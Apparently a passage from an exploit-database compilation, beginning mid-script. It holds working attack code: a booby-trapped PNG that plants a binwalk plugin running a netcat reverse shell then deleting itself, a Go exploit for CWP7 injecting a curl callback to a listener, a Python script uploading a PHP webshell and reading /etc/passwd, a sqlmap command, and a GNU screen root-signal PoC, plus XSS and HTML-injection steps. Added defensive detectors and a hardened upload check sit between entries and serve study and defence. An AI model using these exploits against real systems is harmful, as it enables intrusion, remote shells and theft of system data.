        '        if not os.path.exists("/tmp/.binwalk"):\n',
        '            os.system("nc ' + str(args.ip) + ' ' + str(args.port) + ' -e /bin/bash 2>/dev/null &")\n',
        '            with open("/tmp/.binwalk", "w") as f:\n',
        '                f.write("1")\n',
        '        else:\n',
        '            os.remove("/tmp/.binwalk")\n',
        '            os.remove(os.path.abspath(__file__))\n',
        '            shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n',
    ]

    in_file = open(args.file, "rb")
    data = in_file.read()
    in_file.close()

    with open("/tmp/plugin", "w") as f:
        for line in lines:
            f.write(line)

    with open("/tmp/plugin", "rb") as f:
        content = f.read()

    os.system("rm /tmp/plugin")

    # Valid PNG first, then the PFS header and the plugin body it points at
    with open("binwalk_exploit.png", "wb") as f:
        f.write(data)
        f.write(header_pfs)
        f.write(content)

    print("")
    print("You can now rename and share binwalk_exploit and start your local netcat listener.")
    print("")
```
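The exploit works because the PFS extractor trusts the entry name inside the container and writes wherever `../` leads. Before feeding untrusted firmware images (or, as here, any file that merely looks like a PNG) through an extractor, it is cheap to scan for embedded PFS containers and reject entry names that leave the extraction directory. The block below is an added example written for this page, not binwalk's code: the 16-byte header (magic, six reserved bytes, little-endian entry count) and the 12 bytes of per-entry metadata are read off the exploit's `header_pfs` bytes, and the way the NUL-padded name field is sized (skip padding up to the next non-NUL byte) is an assumption; `build_pfs` only exists to construct test data.

```python
import struct

PFS_MAGIC = b"PFS/0.9\x00"
PFS_HEADER_SIZE = 16       # magic, 6 reserved bytes, uint16 LE entry count (from the exploit's header bytes)
PFS_ENTRY_META_SIZE = 12   # three 32-bit fields after each NUL-padded name (assumed from the same bytes)


def build_pfs(names, name_field=64):
    """Constructed PFS blob in the layout described above; test data only."""
    out = PFS_MAGIC + b"\x00" * 6 + struct.pack("<H", len(names))
    for name in names:
        out += name.encode().ljust(name_field, b"\x00") + struct.pack("<III", 0x1234, 0xA0, 0)
    return out


def iter_pfs_names(blob, offset=0):
    """Yield the entry names of the PFS container that starts at `offset`.

    The name is NUL-terminated; padding is skipped up to the next non-NUL
    byte (assumed to be how the field is sized), then the fixed metadata is
    stepped over to reach the next entry.
    """
    if blob[offset:offset + len(PFS_MAGIC)] != PFS_MAGIC:
        return
    (count,) = struct.unpack("<H", blob[offset + 14:offset + 16])
    pos = offset + PFS_HEADER_SIZE
    for _ in range(count):
        end = blob.find(b"\x00", pos)
        if end < 0:
            return
        yield blob[pos:end].decode("latin-1")
        pos = end
        while pos < len(blob) and blob[pos] == 0:
            pos += 1
        pos += PFS_ENTRY_META_SIZE


def is_unsafe_name(name):
    """True if extracting this entry could write outside the output directory."""
    parts = name.replace("\\", "/").split("/")
    return name.startswith("/") or ".." in parts


def scan_for_pfs_traversal(blob):
    """Locate every embedded PFS container and return the traversal names found."""
    unsafe = []
    start = 0
    while True:
        off = blob.find(PFS_MAGIC, start)
        if off < 0:
            return unsafe
        unsafe.extend(n for n in iter_pfs_names(blob, off) if is_unsafe_name(n))
        start = off + 1


# Constructed sample: PNG signature and some image bytes, then a PFS container
# appended the way the exploit appends it.
SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32 + build_pfs([
    "../../../.config/binwalk/plugins/binwalk.py",
    "etc/config.xml",
])

if __name__ == "__main__":
    print(scan_for_pfs_traversal(SAMPLE))
```

The same normalisation belongs in the extractor itself: resolve the entry name against the output directory and refuse to write if the result does not stay inside it, which is the fix regardless of container format.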
-
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020

```go
package main

import (
	"bytes"
	"crypto/tls"
	"flag"
	"fmt"
	"net/http"
	"time"
)

func main() {
	var host, call string
	flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
	flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
	flag.Parse()

	banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)
`
	fmt.Print(banner)
	fmt.Println("[*] Triggering cURL command")
	fmt.Println("[*] Open Listener on " + call)

	// Skip certificate validation
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	client := &http.Client{Transport: tr}

	// Request URL: the login parameter ends up inside a shell command, so
	// $(...) runs curl; ${IFS} stands in for the space between curl and its argument
	url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"

	// Request body
	body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))

	// Build and send the POST request
	req, err := http.NewRequest("POST", url, body)
	if err != nil {
		fmt.Println("Error building request:", err)
		return
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("Error sending request:", err)
		return
	}
	defer resp.Body.Close()
	time.Sleep(2 * time.Second)
	fmt.Println("\n[*] Check Listener for OOB callback")
}
```
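Because the injection travels in the query string of a login request, it leaves a trace in the web server's access log even when the login itself fails, and the `$(`, backtick and `${IFS}` constructs the exploit relies on never appear in a legitimate login name. The block below is an added example written for this page, not part of the exploit or of CWP: it parses Apache/lighttpd combined-format lines (the format is an assumption, and the sample lines are constructed), pulls the `login` value out of `/login/index.php` requests, decodes it twice to survive double URL-encoding, and reports requests carrying shell metacharacters.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Shell constructs that have no business in a login name.  ${IFS} is the
# whitespace stand-in the exploit uses so the value survives as one token.
INJECTION_RE = re.compile(r"\$\(|`|\$\{IFS\}|\$IFS|[;|&\n]")
# Combined-format prefix: client, ident, user, [timestamp], "METHOD target proto" status.
# Assumed log layout; constructed samples below.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def flagged_login_value(target):
    """Return the decoded `login` value when it carries shell metacharacters, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/login/index.php"):
        return None
    candidates = parse_qs(parts.query, keep_blank_values=True).get("login", [])
    # Also inspect the raw query so a payload containing '&' is not split away.
    candidates.append(parts.query)
    for value in candidates:
        decoded = unquote(unquote(value))   # survive double URL-encoding
        if INJECTION_RE.search(decoded):
            return decoded
    return None


def scan_access_log(lines):
    """Return (client ip, timestamp, decoded payload) for each suspicious login request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = flagged_login_value(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), m.group("ts"), value))
    return hits


# Constructed sample lines (not real CWP logs).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Feb/2023:10:15:01 +0000] "POST /login/index.php?login=$(curl${IFS}10.0.0.9:8020) HTTP/1.1" 200 512 "-" "Go-http-client/1.1"',
    '10.0.0.6 - - [02/Feb/2023:10:15:07 +0000] "POST /login/index.php?login=admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [02/Feb/2023:10:15:09 +0000] "GET /login/index.php?login=%24%28curl%24%7BIFS%7D10.0.0.9%3A8020%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [02/Feb/2023:10:15:11 +0000] "GET /index.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, payload in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} login={payload}")
```

Pair the log check with the outbound side: the callback is a plain `curl` from the panel host to an attacker-chosen address, so egress from the CWP server to arbitrary destinations is the other place this shows up.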
-
Responsive FileManager 9.9.5 - Remote Code Execution (RCE)
# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE)
# Date: 02-Feb-2023
# Exploit Author: Galoget Latorre (@galoget)
# Vendor Homepage: https://responsivefilemanager.com
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip
# Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604
# Version: 9.9.5
# Language: Python 3.x
# Tested on:
#   - Ubuntu 22.04.5 LTS 64-bit
#   - Debian GNU/Linux 10 (buster) 64-bit
#   - Kali GNU/Linux 2022.3 64-bit
# CVE: CVE-2022-46604 (Konstantin Burov)

```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-

import sys
import requests
from bs4 import BeautifulSoup
from termcolor import colored, cprint

# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py 127.0.0.1


def banner():
    """ Function to print the banner """
    banner_text = """
 _____ _____ _____     ___ ___ ___ ___     ___ ___ ___ ___ ___
|     |  |  |   __|___|_  |   |_  |_  |___|  | |  _|  _|     | |
|   --|  |  |   __|___|  _| | |  _|  _|___|__  | . | . |  |  |_  |
|_____|\\___/|_____|   |___|___|___|___|     |_|___|___|___|  |_|

File Creation Extension Bypass in Responsive FileManager <= 9.9.5 (RCE)
Exploit Author: Galoget Latorre (@galoget)
CVE Author: Konstantin Burov
    """
    print(banner_text)


def usage_instructions():
    """ Function that validates the number of arguments.
        The application MUST have 2 arguments:
            - [0]: Name of the script
            - [1]: Target site, which can be a domain or an IP Address
    """
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <target.site>")
        print("Example: python3 exploit.py 127.0.0.1")
        sys.exit(0)


def run_command(web_session, webshell_url, command_to_run):
    """ Function that:
        - Interacts with the webshell to run a command
        - Cleans the response of the webshell
        - Returns the response object and the output of the command
    """
    webshell_response = web_session.get(url=webshell_url + f"?cmd={command_to_run}", headers=headers)
    command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser')
    return (webshell_response, command_output_soup.find('pre').text)


if __name__ == "__main__":
    banner()
    usage_instructions()

    # Change this with the domain or IP address to attack
    if sys.argv[1]:
        host = sys.argv[1]
    else:
        host = "127.0.0.1"

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
    }

    # URL to create a new file
    target_url = f"http://{host}/filemanager/execute.php?action=create_file"

    # Change this to customize the payload (i.e. the content of the malicious file that will be created)
    payload = "<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?></pre></body></html>"
    # oneliner_payload = " <?=`$_GET[_]`?>"

    # URL to get a PHPSESSID value
    cookie_url = f"http://{host}/filemanager/dialog.php"

    # New Session
    session = requests.Session()

    # GET request to retrieve a PHPSESSID value
    cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue")
    try:
        session.get(url=cookie_url, headers=headers)
    except requests.RequestException:
        cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red")
        sys.exit(0)

    if session.cookies.get_dict():
        cprint("[+] PHPSESSID retrieved correctly.", "green")
        cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow")
    else:
        cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red")

    # Params, rename if you want. The extension check is applied to "name"
    # (shell.txt) while the file is written to "path" (shell.php).
    params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload}

    # POST request to create the webshell
    cprint(f"\n[*] Attempting to create a webshell on {host}", "blue")
    response = session.post(url=target_url, headers=headers, data=params)

    # If the status code and the message match, we may have a webshell inside. ;)
    if response.status_code == 200 and response.text == "File successfully saved.":
        # Default webshell path
        shell_url = f"http://{host}/source/shell.php"

        # Verify if the shell was uploaded by running whoami and cat /etc/passwd
        webshell, whoami_output = run_command(session, shell_url, "whoami")
        webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd")

        # Common users when getting a webshell
        common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"]

        # Verify if the command was executed correctly
        if webshell.status_code == 200 or whoami_output.strip().lower() in common_users or "root:x:0:0" in passwd_output:
            cprint("[+] Webshell uploaded - Enjoy!", "green")
            cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow")
            cprint(f"[+] Running `whoami` command: {whoami_output}", "green")

            # Ask to enter into a pseudo-interactive mode with the webshell
            answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta"))
            if answer.upper() == "Y":
                cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue")
                command = ""
                while command.lower() != "exit":
                    # Keep the command's case; only the exit keyword is compared case-insensitively
                    command = input(colored(">> ", "cyan"))
                    if command.lower() == "exit":
                        break
                    webshell, command_output = run_command(session, shell_url, command)
                    cprint(command_output, "cyan")
            cprint("\n[*] Exiting...Bye!", "blue")
    elif response.status_code == 403 and response.text == "The file is already existing":
        cprint("[-] The file that you're trying to create is already on the server.", "red")
    else:
        cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red")
```
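The bug the exploit leans on is a mismatch between the field that is validated (`name`, ending in `.txt`) and the field that decides what is written to disk (`path`, ending in `.php`, with `path_thumb` additionally pointing outside the directory). The block below is an added example written for this page, not Responsive FileManager's code: a function that reproduces that flawed decision next to a hardened one that evaluates the path actually written, rejects every executable extension anywhere in the name, refuses control characters, and confines the resolved path to the upload directory. The allow-list and the base directory are illustrative assumptions.

```python
import posixpath

# Illustrative allow-list; a real deployment would take it from configuration.
ALLOWED_EXT = {"txt", "jpg", "jpeg", "png", "gif", "pdf"}
# Extensions the web server may execute no matter what else is in the name.
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


def vulnerable_is_allowed(name, path):
    """Mirror of the flaw: the allow-list is applied to `name`, but `path` is what gets written."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext in ALLOWED_EXT


def hardened_is_allowed(name, path, base_dir="/var/www/source"):
    """Decide on the path that will actually be written.

    - the resolved path must stay inside base_dir (kills ../thumbs/shell.php)
    - the file name must carry no control characters (kills shell.php\\x00.txt)
    - every extension segment is checked, none may be executable (kills img.php.txt)
    - the final extension must be allow-listed
    `name` is deliberately ignored: it is never what ends up on disk.
    """
    base = base_dir.rstrip("/") + "/"
    target = posixpath.normpath(posixpath.join(base, path))
    if not target.startswith(base):
        return False
    filename = posixpath.basename(target)
    if any(ord(c) < 32 for c in filename):
        return False
    parts = filename.split(".")
    if len(parts) < 2 or "" in parts:          # no extension, dotfile or empty segment
        return False
    if {p.lower() for p in parts[1:]} & EXEC_EXT:
        return False
    return parts[-1].lower() in ALLOWED_EXT


if __name__ == "__main__":
    for name, path in [("shell.txt", "shell.php"), ("shell.txt", "../thumbs/shell.php"),
                       ("notes.txt", "notes.txt"), ("img.txt", "img.php.txt")]:
        print(f"{name!r:12} {path!r:24} vulnerable={vulnerable_is_allowed(name, path)!s:5} "
              f"hardened={hardened_is_allowed(name, path)}")
```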
-
itech TrainSmart r1044 - SQL injection
# Exploit Title: itech TrainSmart r1044 - SQL injection
# Date: 03.02.2023
# Exploit Author: Adrian Bondocea
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/
# Version: TrainSmart r1044
# Tested on: Linux
# CVE : CVE-2021-36520

SQL injection vulnerability in itech TrainSmart r1044 allows remote attackers to view sensitive information via a crafted request to the 'id' parameter of the evaluation/assign-evaluation page; the issue can be confirmed with sqlmap.

PoC:
```
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id --dbs
```
-
GNU screen v4.9.0 - Privilege Escalation
# Exploit Title: GNU screen v4.9.0 - Privilege Escalation
# Date: 03.02.2023
# Exploit Author: Manuel Andreas
# Vendor Homepage: https://www.gnu.org/software/screen/
# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz
# Version: 4.9.0
# Tested on: Arch Linux
# CVE : CVE-2023-24626

```python
import os
import socket
import struct
import argparse
import subprocess
import pty
import time

SOCKDIR_TEMPLATE = "/run/screens/S-{}"
MAXPATHLEN = 4096
MAXTERMLEN = 32
MAXLOGINLEN = 256
STRUCTSIZE = 12584
MSG_QUERY = 9


def find_latest_socket(dir):
    return f"{dir}/{sorted(os.listdir(dir))[-1]}"


def build_magic(ver=5):
    return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver


def build_msg(type):
    # struct msg header: magic, type, then the m_tty path field
    return struct.pack("<ii", build_magic(), type) + MAXPATHLEN * b"T"


def build_query(auser, nargs, cmd, apid, preselect, writeback):
    # Lay out the m.query member of struct msg; apid is the pid the
    # (setuid root) screen process will send SIGHUP to
    assert(len(auser) == MAXLOGINLEN + 1)
    assert(len(cmd) == MAXPATHLEN)
    assert(len(preselect) == 20)
    assert(len(writeback) == MAXPATHLEN)
    buf = build_msg(MSG_QUERY)
    buf += auser
    buf += 3 * b"\x00"  # Padding
    buf += struct.pack("<i", nargs)
    buf += cmd
    buf += struct.pack("<i", apid)
    buf += preselect
    buf += writeback
    # Union padding
    buf += (STRUCTSIZE - len(buf)) * b"P"
    return buf


def spawn_screen_instance():
    # provide a pty
    mo, so = pty.openpty()
    me, se = pty.openpty()
    mi, si = pty.openpty()
    screen = subprocess.Popen("/usr/bin/screen", bufsize=0, stdin=si, stdout=so, stderr=se, close_fds=True, env={"TERM": "xterm"})
    for fd in [so, se, si]:
        os.close(fd)
    return screen


def main():
    parser = argparse.ArgumentParser(description='PoC for sending SIGHUP as root utilizing GNU screen configured as setuid root.')
    parser.add_argument('pid', type=int, help='the pid to receive the signal')
    args = parser.parse_args()
    pid = args.pid

    username = os.getlogin()
    screen = spawn_screen_instance()
    print("Waiting a second for screen to setup its socket..")
    time.sleep(1)

    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    socket_path = find_latest_socket(SOCKDIR_TEMPLATE.format(username))
    print(f"Connecting to: {socket_path}")
    s.connect(socket_path)

    print('Sending message...')
    msg = build_query(username.encode('ascii') + (MAXLOGINLEN + 1 - len(username)) * b"\x00", 0, MAXPATHLEN * b"E", pid, 20 * b"\x00", MAXPATHLEN * b"D")
    s.sendmsg([msg])
    s.recv(512)
    print(f'Ok sent SIGHUP to {pid}!')
    screen.kill()


if __name__ == '__main__':
    main()
```
-
ERPNext 12.29 - Cross-Site Scripting (XSS)
# Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS)
# Date: 7 Feb 2023
# Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla
# Github: https://github.com/patrickdeanramos/CVE-2022-28598
# Vendor Homepage: https://erpnext.com/
# Version: 12.29
# CVE: CVE-2022-28598

Summary:
A stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29: the "last_known_version" field on the "My Settings" page in ERPNext 12.29.0 allows remote attackers to inject arbitrary web script or HTML via a crafted site name, by sending an authenticated POST HTTP request to '/desk#Form/User/(Authenticated User)' and injecting the script into the 'last_known_version' field; the script is rendered when the 'pdf' view of the form is opened. This vulnerability is specifically in the "last_known_version" field found under 'My Settings', which has to be saved first.

1. Log in as any user.
2. Inject the malicious script into the 'last_known_version' field.
3. To view the injected script, open the PDF view of the page; as seen below, the script has been injected successfully.
-
BTCPay Server v1.7.4 - HTML Injection
# Exploit Title: BTCPay Server v1.7.4 - HTML Injection
# Date: 01/26/2023
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Vendor Homepage: https://github.com/btcpayserver/btcpayserver
# Software Link: https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5
# Version: <=1.7.4
# Tested on: Windows10
# CVE : CVE-2023-0493

# Description:
BTCPay Server v1.7.4 HTML injection vulnerability.

# Steps to exploit:
1. Create an account on the target website. Register endpoint: https://target-website.com/register#
2. Move on to the API key page and create an API key with the HTML injection in the label field. Example: <a href="https://hackerbro.in">clickhere</a>
3. Click remove/delete API key; the injected HTML will render.
-
ImageMagick 7.1.0-49 - DoS
## Exploit Title: ImageMagick 7.1.0-49 - DoS
## Author: nu11secur1ty
## Date: 02.07.2023
## Vendor: https://imagemagick.org/
## Software: https://imagemagick.en.uptodown.com/windows/download/82953605
## Reference: https://portswigger.net/daily-swig/denial-of-service
## CVE-ID: CVE-2022-44267

## Description:
ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input. The attacker can easily send a malicious PNG file to the victim, and when the victim opens this PNG the program will crash.

STATUS: HIGH Vulnerability

[+]Payload:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267/PoC)

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267)

## Proof and Exploit:
[href](https://streamable.com/l7z79c)

## Time spend:
00:30:00